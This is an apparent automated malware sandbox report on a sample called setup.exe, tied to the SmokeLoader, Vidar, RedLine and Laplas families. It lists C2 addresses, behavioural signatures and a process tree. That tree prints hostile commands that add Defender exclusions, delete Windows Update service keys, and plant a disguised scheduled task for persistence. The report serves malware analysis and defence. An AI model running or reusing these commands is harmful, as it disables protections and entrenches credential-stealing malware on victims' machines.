Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
12/04/2023, 00:51
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
setup.exe
Resource
win10v2004-20230221-en
General
-
Target
setup.exe
-
Size
213KB
-
MD5
22a06350369a20eabe5a60f29b10409e
-
SHA1
fd12766bc8caf43cd0318933eb9cdd34e8d86bef
-
SHA256
96b92223396da25f949fa4f8f39057db933c3567886f57aa40e6cda3a3d48d96
-
SHA512
8a43318243d6b466193b07996de24cac596bb72740a56937df8e5398bebf11a58e012affa557f31f4dfefa4319938f9e9c70d4be511db992ddd5e64872024be7
-
SSDEEP
3072:aP24+4p4p77GD5qwrQzVKAJ7TDVeSGTUkbCVZ0NXO7WbYbsh5NvJ:4L+4peGDQLzUG7TJNGTUhqOpAxv
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
vidar
3.4
e749025c61b2caca10aa829a9e1a65a1
https://steamcommunity.com/profiles/76561199494593681
https://t.me/auftriebs
-
profile_id_v2
e749025c61b2caca10aa829a9e1a65a1
-
user_agent
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Extracted
redline
build03
65.21.3.192:32845
-
auth_value
688766d7eb9d4a5fde1dec6cdf7c3d9e
Extracted
laplas
http://185.106.92.74
-
api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2772 created 3204 2772 Tzairumea840.exe 23 PID 2772 created 3204 2772 Tzairumea840.exe 23 PID 2772 created 3204 2772 Tzairumea840.exe 23 PID 2772 created 3204 2772 Tzairumea840.exe 23 -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts Tzairumea840.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 85906762675035264924.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation D595.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation C0B5.exe -
Executes dropped EXE 7 IoCs
pid Process 4232 C0B5.exe 4332 D595.exe 4536 17433733360249395485.exe 1352 85906762675035264924.exe 2760 svcservice.exe 2772 Tzairumea840.exe 3836 D595.exe -
Loads dropped DLL 2 IoCs
pid Process 4232 C0B5.exe 4232 C0B5.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000002317c-286.dat upx behavioral2/files/0x000600000002317c-288.dat upx behavioral2/files/0x000600000002317c-289.dat upx behavioral2/memory/4536-292-0x0000000000DB0000-0x0000000001C13000-memory.dmp upx behavioral2/memory/4536-295-0x0000000000DB0000-0x0000000001C13000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 85906762675035264924.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xrdsu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Ygpxl\\Xrdsu.exe\"" D595.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1352 85906762675035264924.exe 1352 85906762675035264924.exe 2760 svcservice.exe 2760 svcservice.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4332 set thread context of 3836 4332 D595.exe 115 -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4472 sc.exe 2224 sc.exe 620 sc.exe 3972 sc.exe 336 sc.exe 2084 sc.exe 4732 sc.exe 4284 sc.exe 3272 sc.exe 1164 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4656 4232 WerFault.exe 88 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C0B5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C0B5.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4644 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1188 setup.exe 1188 setup.exe 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3204 Explorer.EXE -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 1188 setup.exe 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE 3204 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4332 D595.exe Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeDebugPrivilege 3876 powershell.exe Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeShutdownPrivilege 3204 Explorer.EXE Token: SeCreatePagefilePrivilege 3204 Explorer.EXE Token: SeDebugPrivilege 908 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeShutdownPrivilege 3784 powercfg.exe Token: SeCreatePagefilePrivilege 3784 powercfg.exe Token: SeShutdownPrivilege 3372 powercfg.exe Token: SeCreatePagefilePrivilege 3372 powercfg.exe Token: SeShutdownPrivilege 216 powercfg.exe Token: SeCreatePagefilePrivilege 216 powercfg.exe Token: SeShutdownPrivilege 3912 powercfg.exe Token: SeCreatePagefilePrivilege 3912 powercfg.exe Token: SeDebugPrivilege 3836 D595.exe Token: SeIncreaseQuotaPrivilege 3228 powershell.exe Token: SeSecurityPrivilege 3228 powershell.exe Token: SeTakeOwnershipPrivilege 3228 powershell.exe Token: SeLoadDriverPrivilege 3228 powershell.exe Token: SeSystemProfilePrivilege 3228 powershell.exe Token: SeSystemtimePrivilege 3228 powershell.exe Token: SeProfSingleProcessPrivilege 3228 powershell.exe Token: SeIncBasePriorityPrivilege 3228 powershell.exe Token: SeCreatePagefilePrivilege 3228 powershell.exe Token: SeBackupPrivilege 3228 powershell.exe Token: SeRestorePrivilege 3228 powershell.exe Token: SeShutdownPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeSystemEnvironmentPrivilege 3228 powershell.exe Token: SeRemoteShutdownPrivilege 3228 powershell.exe Token: SeUndockPrivilege 3228 powershell.exe Token: SeManageVolumePrivilege 3228 powershell.exe Token: 33 3228 powershell.exe Token: 34 3228 powershell.exe Token: 35 3228 powershell.exe Token: 36 3228 powershell.exe Token: SeIncreaseQuotaPrivilege 3228 powershell.exe Token: SeSecurityPrivilege 3228 powershell.exe Token: SeTakeOwnershipPrivilege 3228 powershell.exe Token: SeLoadDriverPrivilege 3228 powershell.exe Token: SeSystemProfilePrivilege 3228 powershell.exe Token: SeSystemtimePrivilege 3228 powershell.exe Token: SeProfSingleProcessPrivilege 3228 powershell.exe Token: SeIncBasePriorityPrivilege 3228 powershell.exe Token: SeCreatePagefilePrivilege 3228 powershell.exe Token: SeBackupPrivilege 3228 powershell.exe Token: SeRestorePrivilege 3228 powershell.exe Token: SeShutdownPrivilege 3228 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeSystemEnvironmentPrivilege 3228 powershell.exe Token: SeRemoteShutdownPrivilege 3228 powershell.exe Token: SeUndockPrivilege 3228 powershell.exe Token: SeManageVolumePrivilege 3228 powershell.exe Token: 33 3228 powershell.exe Token: 34 3228 powershell.exe Token: 35 3228 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3204 wrote to memory of 4232 3204 Explorer.EXE 88 PID 3204 wrote to memory of 4232 3204 Explorer.EXE 88 PID 3204 wrote to memory of 4232 3204 Explorer.EXE 88 PID 3204 wrote to memory of 4332 3204 Explorer.EXE 90 PID 3204 wrote to memory of 4332 3204 Explorer.EXE 90 PID 3204 wrote to memory of 4332 3204 Explorer.EXE 90 PID 3204 wrote to memory of 4404 3204 Explorer.EXE 91 PID 3204 wrote to memory of 4404 3204 Explorer.EXE 91 PID 3204 wrote to memory of 4404 3204 Explorer.EXE 91 PID 3204 wrote to memory of 4404 3204 Explorer.EXE 91 PID 3204 wrote to memory of 724 3204 Explorer.EXE 92 PID 3204 wrote to memory of 724 3204 Explorer.EXE 92 PID 3204 wrote to memory of 724 3204 Explorer.EXE 92 PID 3204 wrote to memory of 956 3204 Explorer.EXE 93 PID 3204 wrote to memory of 956 3204 Explorer.EXE 93 PID 3204 wrote to memory of 956 3204 Explorer.EXE 93 PID 3204 wrote to memory of 956 3204 Explorer.EXE 93 PID 3204 wrote to memory of 1908 3204 Explorer.EXE 94 PID 3204 wrote to memory of 1908 3204 Explorer.EXE 94 PID 3204 wrote to memory of 1908 3204 Explorer.EXE 94 PID 4332 wrote to memory of 3876 4332 D595.exe 95 PID 4332 wrote to memory of 3876 4332 D595.exe 95 PID 4332 wrote to memory of 3876 4332 D595.exe 95 PID 3204 wrote to memory of 5072 3204 Explorer.EXE 97 PID 3204 wrote to memory of 5072 3204 Explorer.EXE 97 PID 3204 wrote to memory of 5072 3204 Explorer.EXE 97 PID 3204 wrote to memory of 5072 3204 Explorer.EXE 97 PID 3204 wrote to memory of 2092 3204 Explorer.EXE 98 PID 3204 wrote to memory of 2092 3204 Explorer.EXE 98 PID 3204 wrote to memory of 2092 3204 Explorer.EXE 98 PID 3204 wrote to memory of 2092 3204 Explorer.EXE 98 PID 3204 wrote to memory of 2336 3204 Explorer.EXE 99 PID 3204 wrote to memory of 2336 3204 Explorer.EXE 99 PID 3204 wrote to memory of 2336 3204 Explorer.EXE 99 PID 3204 wrote to memory of 2336 3204 Explorer.EXE 99 PID 4232 wrote to memory of 4536 4232 C0B5.exe 100 PID 4232 wrote to memory of 4536 4232 C0B5.exe 100 PID 3204 wrote to memory of 3884 3204 Explorer.EXE 102 PID 3204 wrote to memory of 3884 3204 Explorer.EXE 102 PID 3204 wrote to memory of 3884 3204 Explorer.EXE 102 PID 4536 wrote to memory of 540 4536 17433733360249395485.exe 103 PID 4536 wrote to memory of 540 4536 17433733360249395485.exe 103 PID 3204 wrote to memory of 1828 3204 Explorer.EXE 105 PID 3204 wrote to memory of 1828 3204 Explorer.EXE 105 PID 3204 wrote to memory of 1828 3204 Explorer.EXE 105 PID 3204 wrote to memory of 1828 3204 Explorer.EXE 105 PID 540 wrote to memory of 4624 540 cmd.exe 106 PID 540 wrote to memory of 4624 540 cmd.exe 106 PID 4232 wrote to memory of 1352 4232 C0B5.exe 107 PID 4232 wrote to memory of 1352 4232 C0B5.exe 107 PID 4232 wrote to memory of 1352 4232 C0B5.exe 107 PID 4232 wrote to memory of 2020 4232 C0B5.exe 108 PID 4232 wrote to memory of 2020 4232 C0B5.exe 108 PID 4232 wrote to memory of 2020 4232 C0B5.exe 108 PID 2020 wrote to memory of 4644 2020 cmd.exe 111 PID 2020 wrote to memory of 4644 2020 cmd.exe 111 PID 2020 wrote to memory of 4644 2020 cmd.exe 111 PID 1352 wrote to memory of 2760 1352 85906762675035264924.exe 113 PID 1352 wrote to memory of 2760 1352 85906762675035264924.exe 113 PID 1352 wrote to memory of 2760 1352 85906762675035264924.exe 113 PID 4332 wrote to memory of 2772 4332 D595.exe 114 PID 4332 wrote to memory of 2772 4332 D595.exe 114 PID 4332 wrote to memory of 3836 4332 D595.exe 115 PID 4332 wrote to memory of 3836 4332 D595.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1188
-
-
C:\Users\Admin\AppData\Local\Temp\C0B5.exeC:\Users\Admin\AppData\Local\Temp\C0B5.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\ProgramData\17433733360249395485.exe"C:\ProgramData\17433733360249395485.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\17433733360249395485.exe4⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵PID:4624
-
-
-
-
C:\ProgramData\85906762675035264924.exe"C:\ProgramData\85906762675035264924.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C0B5.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4644
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 21163⤵
- Program crash
PID:4656
-
-
-
C:\Users\Admin\AppData\Local\Temp\D595.exeC:\Users\Admin\AppData\Local\Temp\D595.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\D595.exeC:\Users\Admin\AppData\Local\Temp\D595.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4404
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:724
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:956
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1908
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5072
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2092
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2336
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3884
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4104
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3912
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:2740
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2224
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:620
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3972
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4732
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4368
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2308
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:748
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2180
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4156
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yqhkxrl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵PID:3800
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:3180
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4728
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:3520
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:336
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3272
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4472
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1164
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4184
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4580
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:4508
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3420
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:2680
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4584
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4916
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:388
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:4772
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵PID:3452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4232 -ip 42321⤵PID:4120
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:4532
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD558fe5c1f5bb97d2ab8c07d9b2165d291
SHA17fa1fd096e3e299a1d12620afb5f0e8bbac501fc
SHA2569ec7b6c726d9cafca8ab233f83133e06adf5a8af6898197ffc7c5ef54b402694
SHA512ee7532ef1d4903eb4a6fddca47774358a67904ec49cbc700a2161c9f1f372bd02679fbeb4bada5cb6d940946084b080f7bbc138d4a8202fdbed5b9a8bc377e01
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
